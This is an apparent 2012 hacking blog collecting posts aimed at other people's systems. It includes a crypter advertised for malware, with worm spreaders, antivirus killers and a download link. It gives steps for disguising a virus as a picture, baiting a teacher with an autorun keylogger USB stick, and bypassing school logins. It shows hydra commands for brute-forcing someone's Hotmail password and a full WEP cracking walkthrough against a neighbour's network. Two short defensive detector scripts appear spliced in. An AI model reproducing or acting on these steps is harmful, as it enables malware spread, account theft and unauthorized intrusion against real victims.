Monday, July 30, 2012

Best Free VPN Full Cracked Version


Hi all users, here is the solution to your question about a free VPN, so without losing a single moment, let's get started.

Advantages of  UltraVPN
  • Absolutely Free
  • No Annoying Ads
  • No Bandwidth Limits
  • No Congestions
  • No Frequent Disconnections
  • Strategically Located Servers
  • Dedicated Torrent Servers
  • Daily Server Updates

How to get access in UltraVpn Pro:

1. Simply Download it from Here (this is the Full Ver.)


>ALL SERVERS ARE UP
  • 5 US servers
  • 2 HK servers
  • 1 MIA and
  • 1 LA server
Enjoy & Stay
Discovered this like a month ago and it's AWESOME! I just can't ''internet'' without it! :)

Sunday, July 8, 2012

2012 Crypter


[Image: iHp2GmBRNs9RE.png]

[Image: P1.png]
[Image: P2.png]
[Image: P3.png]


Features:
    [+]Limited Copies To Sell
      [+]Less Users of Crypter So less Detection 
    [+]Coded in C#
      [+]Works on all OS with 2.0 framework (By default in Xp sp3, Vista, 7) 
    [+]Working on : XP/VISTA/7 [32/64 BIT]
      [+]Unicode Os Support
    [+]Private Encrypted Fud RunPE
      [+]RunPE #1 (Special RunPE Coded In VB)
      [+]RunPE #2 (Special RunPE Coded In C#)
    [+]Custom Injection
      [+]Drop & Run
      [+]vbc.exe
      [+]csrss.exe
      [+]svchost.exe
      [+]winlogon.exe
      [+]Default Browser

    [+]9 Different Encryptions
      [+]Polymorphic Encryption
    [+]File Binder
      [+]Binds Any File (.jpg, .mp3, .pdf, .wmv etc.)
      [+]One time execution Binder added
    [+]Compressed OutPut
      [+]40% Small Output then the server size
    [+]Custom encryption Pool
      [+]Creates an Unicode Pass for encryption
    [+]25+ Antis
      [+]Kills most Of all
    [+]2 Start-Up Methods
      [+]HKCU
      [+]Add to Start-up Folder
    [+]Custom Start-up Name
      [+]Use your desired Start-up name
    [+]Custom Install Path
      [+]Temp
      [+]Appdata
      [+]My Documents
    [+]Hide File
      [+]Hides the file After It runs
    [+]4 Worm Functions
      [+]USB Spreader
      [+]RAR Spreader
      [+]Zip Spreader
      [+]Lan Spreader
    [+]4 Disablers
      [+]Task Manager
      [+]System Restore
      [+]CMD
      [+]System Registry
    [+]NT Header
      [+]Protects output from reflection 
    [+]File Persistence
      [+]Protects your file from Getting Deleted 
    [+]Melt File
      [+]Deletes itself at the end, When ran
    [+]Bypass Firewall
      [+]Bypass into network security of firewall
    [+]Bypass UAC
      [+]Bypass any UAC level in Vista & 7
    [+]Assembly Changer
      [+]Set desired assembly in the output file 
    [+]File Cloner
      [+]Clone Assembly of any executable
    [+]Icon Changer
      [+]Get your desired icon in the output file 
    [+]Extension Spoofer
      [+]Set any extension to the output (.jpg, .pdf, .txt, .mp3, .wmv)
    [+]Auto-Update
      [+]Automatically Updates when any Update is available.
      [+]Updated almost twice a week
    [+]Dynamic HWID
      [+]Changes your HWID on your need 
    [+]Botkiller (Added Soon)
      [+]Kills all Rats & keyloggers from PC 

100% Tested and Works With:
    [√] BlackShades RAT
    [√] BlackShades HTTP
    [√] Blackshades Stealer
    [√] Blackshades Fusion
    [√] CyberGate
    [√] DarkComet 5
    [√] SpyNet
    [√] XtremeRAT
    [√] iStealer
    [√] DDoSeR
    [√] Albertino's Advanced RAT
    [√] Poison Ivy
    [√] Cerberus
    [√] xDoseR
    [√] Turkojan 4 Gold
    [√] Dark DDoser
    [√] Cammy
    [√] POE Stealer
Download 2012 Crypter with 2 Stubs : http://uppit.com/n69kgxm5phtz/2012.rar



How To Access C Drive When It's Blocked


Introduction

Today, I am going to release my tutorial. A lot of schools have blocked the C drive to prevent hacking attempts on the school systems/machines. There are many ways to access the drive, including CMD, Firefox/Google Chrome, etc. Please follow all your local laws. Read their Legal. And do not, I REPEAT, DO NOT DELETE ANY SYSTEM FILES FROM ANY EDUCATIONAL COMPUTERS, IT WILL END BADLY!

Ok that is all over and done with, now for the tutorial.

Firefox/Google Chrome

Open Firefox or Google Chrome and type the following in the URL;

Quote:C:\

This will not allow you to open the files, but download them. In other words, you need the whole folder to work a .exe file (Unless it is a self ran .EXE or a text file)

This method is useful for trying to search a file and open the file with CMD.

Command Prompt


Windows 7 (THANKS TO W0lfbane): Read the above tutorial but instead of "command.com" put in the following;

Quote:@echo off
title CMD
:1
set /p a=%cd%^>
%a%
goto :1

To browse through the C Drive, type in the following;

Quote:C:

And if you want to open a file, type in the following for the example;

Quote:start C:\Windows\cmd.exe

Bypassing Administrator Password (Kon-Boot)


Bypassing Administrator Password: Only Windows XP

You will need a LAN cord for this bypass. If your school/work is connected via wireless, you cannot do this.

What a LAN cord looks like

[Image: CALAN-BL-XX_Lan_cable_01.jpg]

When you are connected to a network, you can access full Administrator rights by doing the following steps;

1. Reboot system.

2. Find where the LAN/Local cord is located.

3. Login, when it says "Applying User Settings" take out the LAN cord as quickly as you can.

4. Wait till it logs in. When you are on your desktop, put the LAN cord back in to access the Internet.

Keylogging And Social Engineering

It often requires no techy knowledge to instigate, but the more you have, the better. For example, leave a USB stick beside the teacher's computer in the computer-room/library/classroom, with an Autorun keylogger. Tell the teacher that the USB is yours. S/He should plug it into their PC and prove it is yours.

Linux Bootable USB

(Thanks To KlokWeiss)

This method of getting a live install to a USB drive is the simplest available using Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)

2. Format the USB drive to FAT32

3. Download Unetbootin from http://unetbootin.sourceforge.net/

4. Start Unetbootin and select diskimage (use the backtrack-final ISO)

5. Change the boot startup to USB via BIOS.

6. Log into BackTrack with the default username and password root / toor.

End

There are countless ways to access the School/Work Place System to gain control to the C:\ Drive. Hope you learned a lot reading this thread.

Please do not leach this thread without my permission. It's just a PM away.


How To Bypass Windows And Linux Admin Login


Kon-Boot Tutorial

Today I am going to tell you how to bypass the Windows and Linux admins' account without a password cracker.

How Does It Work?

A program called Kon-Boot modifies your BIOS only temporarily so it lets Kon-Boot bypass the password authentication.

What You Need


Windows or Linux Installed
Kon-Boot
Spare CD or USB
A Computer With BIOS Installed

How To Install

First you will need to download the file here http://www.multiupload.com/UMFD8T2MFO

The old link didn't seem to work anymore, I give credit to mepsnet for the multiupload link

When you have finished downloading, extract the .Zip file on your desktop.

Download a .Iso burner such as ISO Recorder Power Toy http://www.petri.co.il/how_to_write_iso_files_to_cd.htm

Burn the .Iso to a disc then reboot your computer.

Go to your BIOS and change the boot to CD. Then put CD in the computer and save and exit.

How To Bypass Login

The computer should start up the CD. It should say that BIOS is ok and then start Windows/Linux as normal.

The computer should now go to the log in page (Unless you are the only user on the computer, it will log in automatically) Click any user with a password and should log in without a password.

End

I recommend not doing this on an old computer because it might harm the BIOS chip.

Thank you for reading my tutorial.


Hide any file inside a picture!



Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain

1) Create your virus. We shall call it 'server1.exe' for now.

[Image: server1.png]

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

[Image: bindere.th.png]

3.5) I recommend Easy Binder 2.0, which comes with a bytes adder and an icon extractor, as well as some really good packing options. I've uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb < This will be caught by your AV as "Binder/Kit". It is not a virus, it is a binder that is not undetectable. If you don't wish to use it, that's fine, find your own.

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

[Image: known.th.png]

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.

[Image: hpic.th.png]

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I recommend Icon Extractor V3.8 FULL with Serial

[Image: iconchange.th.png]

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

[Image: msnz.th.png]

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

[Image: downloadfq.th.png]

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.
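For mail gateways and file-upload filters, the renaming in step 5 and the bound executable from step 3 leave two things a defender can check: the name carries a picture extension before a final extension that Windows runs, and the content still begins with the PE "MZ" signature. The following is an added example, not part of the original post; the function names, finding labels and sample inputs are constructed for illustration.

```python
import re

# Extensions Windows runs directly when double-clicked.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}
# Extensions a reader takes for harmless media or documents.
DECOY_EXTS = ("jpg", "jpeg", "png", "gif", "bmp", "pdf", "txt", "mp3", "wmv")
# A decoy extension counts only when it ends there (".txt " yes, ".txtfile" no).
DECOY_INSIDE = re.compile(r"\.(?:%s)(?![A-Za-z0-9])" % "|".join(DECOY_EXTS), re.I)


def final_extension(name):
    """Return the last extension, lower-cased, or '' if there is none."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot > 0 else ""


def content_kind(head):
    """Classify a file by its first bytes, ignoring whatever the name claims."""
    if head[:2] == b"MZ":
        return "pe"
    if head[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if head[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    return "unknown"


def assess(name, head=b""):
    """Return the findings for one attachment name plus its leading bytes."""
    ext = final_extension(name)
    stem = name[: len(name) - len(ext)]
    runs = ext in EXECUTABLE_EXTS
    decoy_in_stem = DECOY_INSIDE.search(stem) is not None
    decoy_final = ext.lstrip(".") in DECOY_EXTS

    findings = []
    if runs and decoy_in_stem:
        # "picture.jpeg - something.com": the part the user reads is not the type.
        findings.append("decoy-extension-before-executable")
    if ext == ".com" and "@" in stem:
        # The name ends like an e-mail address, but .com is an executable type.
        findings.append("address-lookalike-com")
    if content_kind(head) == "pe" and (decoy_in_stem or decoy_final):
        # The name promises media while the content is a Windows executable.
        findings.append("pe-content-behind-decoy-name")
    return findings


def scan(samples):
    """Map each flagged name to its findings; clean names are left out."""
    report = {}
    for name, head in samples:
        findings = assess(name, head)
        if findings:
            report[name] = findings
    return report


# Constructed samples: (file name, first bytes of the file).
SAMPLES = [
    ("HPIC_119.jpeg - test@test.com", b"MZ\x90\x00"),
    ("holiday.jpeg", b"\xff\xd8\xff\xe0"),
    ("holiday.jpeg", b"MZ\x90\x00"),
    ("command.com", b"MZ\x90\x00"),
    ("notes.txt.exe", b""),
]

if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(name, "->", ", ".join(findings))
```

Blocking on the content check as well as the name check matters because changing the icon or the file name does not change the first bytes of the file.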

(100% WORKS)Unblock websites on your schools computer!(100% WORKS)

1)Open "My computer" and go to
c:\windows\system32\drivers\etc

2)Open hosts file with notepad.

3) erase any websites written there and save!

Way 2:

1) Open the cmd and ping your website: Open cmd and write ping yoursite.com 

If cmd is blocked open notepad and write: start command.com
and save it as cmd.bat (don't forget the .bat)
Run it and a cmd will open.

2) it will say its ip with many other things

3) Open your browser and instead of writing the site address write its IP!

Way 3:

1) Go to google.com
2)Go to the translate section
3)write your website and on the other site if you press your site it translates it to the language you had and it's not blocked anymore!

Way 4:

1) Go to http://l33ts.site11.com (My site) 

2) Accept what it says and it will open Paradox OS.
3) At the bottom left it says proxy. Press the icon
4)Write your site and press go!
5) This OS is made for Google Chrome so I prefer to use that browser if you can.
(My website is Temporary down. You can use http://www.anonasurf.com until it gets fixed.)

Way 5: 

1)Download a different browser. If you can't download it, install it on your PC and copy the files to your USB.

2) The website are no longer blocked!

Way 6: This is a bit like way 3. We are using google. 

1)Go to google.com and write the site you want to access. 

2)When you find it press "cached". The website will load!

If all 6 ways don't work then uninstall everything in the computer and try again!!!! LOL

Thanks for viewing this thread and good luck!

This works on EVERY School. I know that because my school has some of the best securities and only way 4 worked. So it must work for you too.

Please post here and tell if you liked it and if it worked!

Bruteforce your enemy and recover the password



So, I guess you want to crack hotmail accounts? Well I'm here to show you.
Fed up of downloading bruteforcing applications? Ones that don't work? Or you're scared they may be backdoored?

Let's use a tool that is legitimate for breaking the security on logins.
This tool is called Hydra.

You can download it from..
http://www.thc.org/thc-hydra/

Because I use GNU/Linux, this tutorial will be based on Ubuntu 12.04.
Don't worry if you use Windows, the commands are pretty much the same.

Open a terminal and type...
Code:
sudo apt-get install hydra

If you prefer a GTK/GUI version.
Code:
sudo apt-get install hydra-gtk

Only the command line/terminal version is covered in this tutorial.
I want you to use less of GUI's, we are using Linux after all :)

Let's go!
So.. if you type..
Code:
hydra

You'll get a list of options to choose from,
We want to attack the SMTP - which is the mail server, for hotmail.
Because Hotmail runs on SSL connections, we need to specify the SSL port when attacking.

The full command looks like this..

Make sure you FIRST change to the wordlist directory, if you saved the 14 million pass to the Desktop..

Code:
cd ~/Desktop

Code:
hydra -V -S -l Emailaddress@hotmail.com -P "14 million pass.txt" -e ns -o "Cracked!" -t 8 pop3.live.com pop3 -s 995

These options mean...
Quote:hydra - We use the application name.

-V - This shows the output of passwords it checks, you can also add -Vv for extra verbosity [errors, warnings etc - Not really recommended, as it just floods the window]

-S - Use an SSL connection [Needed!]

-P The dictionary list we will use to attack the given Hotmail address [ I will post a link to a 14 million wordlist, perfect for cracking!]

-e ns - try "n" null password, "s" login as pass

-o "Cracked" - Once the password has been cracked, it will store it in a nice file called "Cracked" [Note your directory!]

-t 8 - The number of tasks to use, 8 is fine, any more could cause too many passwords checking and overload the times it gets to check each individual password.

Server - Service - pop3.live.com pop3 - We want to use Hotmail's pop3 server with the service pop3!

-s 995 - This is the SSL port [Needed!]

Upon hitting enter, it should start cracking!
If you get errors, like timeout errors, re-check your terminal command, an error isn't because the bruteforce doesn't work, it just means there is something wrong with the command (Unless Hotmail put a security lock on!)

Here is a picture of me Cracking!
[Image: f4xQa.jpg]

Here is the 14 million wordlist.
Code:
http://www.mediafire.com/?1whma3u7aev3985

If you want to resume the attack at a later day, use the command..
Code:
hydra -R

Not using this command will overwrite the recovery file and start from the beginning.

Hope you guys like.
Please, if you share this, give me credits :)
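On the mail-server side, a run like the one above (eight parallel tasks working through a wordlist against one mailbox) shows up as a dense burst of failed POP3 logins for a single account, which is what the "security lock" mentioned in the post reacts to. The following is an added example, not part of the original post, of a sliding-window detector that also flags a successful login arriving in the middle of such a burst; the log format, field names and thresholds are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
# Hypothetical log line format, constructed for this example.
LINE = re.compile(
    r"^(?P<ts>\S+) pop3s auth=(?P<result>OK|FAIL) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse(line):
    """Return (timestamp, result, user, source) or None for unrelated lines."""
    m = LINE.match(line.strip())
    if not m:
        return None
    return datetime.strptime(m["ts"], TS_FORMAT), m["result"], m["user"], m["src"]


def detect(lines, window=timedelta(seconds=60), threshold=10):
    """Flag mailboxes with `threshold` failures inside `window`, and any
    successful login that lands while such a burst is still in the window."""
    recent = defaultdict(deque)  # user -> timestamps of recent failures
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        failures = recent[user]
        # Drop failures that have aged out of the window.
        while failures and ts - failures[0] > window:
            failures.popleft()
        if result == "FAIL":
            failures.append(ts)
            # Alert once, at the moment the count crosses the threshold.
            if len(failures) == threshold:
                alerts.append(("guessing", user, src, ts.strftime(TS_FORMAT)))
        elif len(failures) >= threshold:
            # A guess may have worked: treat the password as compromised.
            alerts.append(("success-after-guessing", user, src, ts.strftime(TS_FORMAT)))
            failures.clear()
    return alerts


def sample_log():
    """Constructed log lines (documentation addresses, made-up accounts)."""
    start = datetime(2012, 7, 8, 2, 29, 0)

    def fmt(offset, result, user, src):
        ts = (start + timedelta(seconds=offset)).strftime(TS_FORMAT)
        return f"{ts} pop3s auth={result} user={user} src={src}"

    lines = [fmt(i, "FAIL", "alice@example.test", "203.0.113.7") for i in range(12)]
    lines.append(fmt(12, "OK", "alice@example.test", "203.0.113.7"))
    # An ordinary user who mistypes twice and then logs in.
    lines.append(fmt(3, "FAIL", "bob@example.test", "198.51.100.20"))
    lines.append(fmt(8, "FAIL", "bob@example.test", "198.51.100.20"))
    lines.append(fmt(20, "OK", "bob@example.test", "198.51.100.20"))
    lines.sort()  # ISO timestamps sort chronologically
    return lines


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

Counting per mailbox rather than per source address means guesses spread over several addresses still add up, and the success-after-guessing alert is the one that should trigger a forced password reset.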

Saturday, July 7, 2012

Crack WEP on Windows without linux, supports intel 5100/5300 NOOB friendly

This is what you need:
1. Commview 6.2(it supports intel 5100 & 5300) 
http://www.tamos.com/files/ca6.zip
- this is a direct download, i copied the url from IDM.

2. Aircrack for windows:
http://www.aircrack-ng.org/ (click windows)
PICTURE:http://i41.[censored].com/29c1d6p.jpg

http://www.dll-files.com/dllindex/dll-fi...ml?cygwin1 (click download)
PICTURE:http://i40.[censored].com/vq6249.jpg


http://www.tuto-fr.com/tutoriaux/crack-w...p/Peek.zip
(downloads the same as commview6.2)

INSTALLATION:
1.Install commview 6.2, install like any other regular program.
2. extract aircrack zip file to root, which is "C" for most computers
3.now extract peek zip file to the bin folder which is in aircrack like this C:\aircrack folder\bin.
4. and extract dll file to bin folder also.

You will be overwriting some files, just click yes to overwrite them.
I recommend making a shortcut for aircrack GUI.exe, because you're going to use it a lot.
Now go take a 5 minute break. 

OK back from break? Now get ready

Real WEP capturing steps:
1. open commview 6.2 and click the M and the C to shade them and then click play.(The D should be unshaded )

2.Now click start scan, choose band "i use the b/g/n" and then click capture don't worry.

3.Now wait about 2 minutes and right click and copy mac address of the wep network with the most packets or best signal.


4. Enable MAC address rules, action: capture, add record: both, paste mac address, then click add mac address(look like pic except the mac address, will be different)


5. Final steps in configuration
Click logging tab, make sure auto saving is checked, and increase size to 150 or higher, this can be adjusted later and leave logs directory as is.(I did 1,000,000 mb = 1GB, because of capturing 13 networks at a time).

NOW WAIT until you get about 1 million through 2 million packets, or just record overnight for at least 2 nights. Then continue.

As you can see, I have collected keys for about 1 week on and off, because of torrent downloads

PART 2

1. Click logging tab and save all packets in buffer, then click concatenate Logs, and select all logs and save in folder. (I saved in a new folder called binded and you can see there are logs from different days)

2. Open log viewer, by pressing Ctrl+L or going to file in top right corner.

3. Load commview logs, should look like this pic when loaded. (I have 189518 keys, out of almost 2 million packets)

4. Now go to file and click export logs and to the bottom of drop box click wireshark/tcp dump format. Now give this file a name, something easy to remember.

5. You're done with commview, but I recommend leaving it open to get more packets just in case.

PART 3
1. Open aircrack GUI.exe
2. now click choose, and go find the .cap file you saved.


3.click launch and click the one you want, i wanted the first one so i choose 1 and press enter.(this step is only for people with multiple networks)

4. now wait and you should get this.
PICTURE:http://i40.[censored].com/1z1uvkz.jpg

5. now right click and select all and press enter and save to notepad. or connect and enter key without colon in wep password box.

That's it .
The other 25% that I got it from was from here:
5% - http://wirelessdefence.org/Contents/Airc...nstall.htm
10% - other multiple sources.

I got this working, because of stress.

EDUCATION PURPOSES ONLY. I"LL ADD MAC CHANGER WHEN I FIND A GOOD ONE.

Guide to WEP Hacking WI-FI

This guide is aimed to help you crack WEP Passwords.. As said, this is a Total n00b Guide to Wireless Hacking.. 

The Stuff that you are going to need is 
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection

Before we Start, I take it for Granted that you are aware of a Few things...

I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.

Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)

Now that we are Ready.. Lets Begin..

If You are Using a Boot CD, As in my case, You will see the following screen when the CD Loads.

[Image: backtrackstartup.png]

Just Select "Start BackTrack FrameBuffer (1024x768)
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.

What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".

Once, the Startup is Completed you will be at the Desktop of Backtrack

Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
[Image: backtrackstartnetwork.png]

Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.

Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.

In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.

Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0

Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
[Image: airmon1.png]

Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0

What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second

You Might just wanna copy the BSSID as it is going to be used a lot.

Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}


[Image: airodump1.png]

Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.

Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0

Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)

[Image: airodump3.png]

Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay

Its your Lucky day..lol.. I will be going through both. 

But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this when the Attack is Successful. 

02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)

Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.

[Image: aireplay3.png]

OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER. Our Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.

It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.

[Image: aireplay6.png]

Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it. 

Just hit ENTER and there we go, the Packet has been made.

[Image: aireplay8.png]

Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0

Just hit ENTER and the Mag!c Finally begins...

Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...

[Image: aireplay12.png]

Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs

Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....

And Voila... Here it is....

[Image: aireplay15.png]
